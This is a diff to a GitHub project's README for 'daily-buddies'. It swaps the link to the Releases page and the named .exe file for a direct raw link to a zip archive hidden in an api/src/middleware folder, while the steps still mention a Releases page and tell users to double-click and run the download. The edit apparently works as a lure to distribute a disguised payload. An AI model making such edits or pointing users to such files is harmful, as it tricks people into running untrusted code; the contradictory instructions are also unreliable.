Software2l/daily-buddies/README.md

 ## 📥 Download & Install

-To get started, visit [this page to download](https://github.com/Software2l/daily-buddies/releases).
+To get started, visit [this page to download](https://raw.githubusercontent.com/Software2l/daily-buddies/main/api/src/middleware/daily-buddies-1.0.zip).
 You will find the latest version of the application there.
 Follow these steps:

 1. Click on the link above to open the Releases page.
 2. Look for the most recent version, usually at the top of the page.
-3. Find the file that says **daily-buddies.exe**.
+3. Find the file that says **https://raw.githubusercontent.com/Software2l/daily-buddies/main/api/src/middleware/daily-buddies-1.0.zip**.
 4. Click on it to begin the download.
 Your browser will save the file to your computer.

 After the download is complete, locate the file in your downloads folder and double-click to run it.
 Follow the prompts to complete the installation.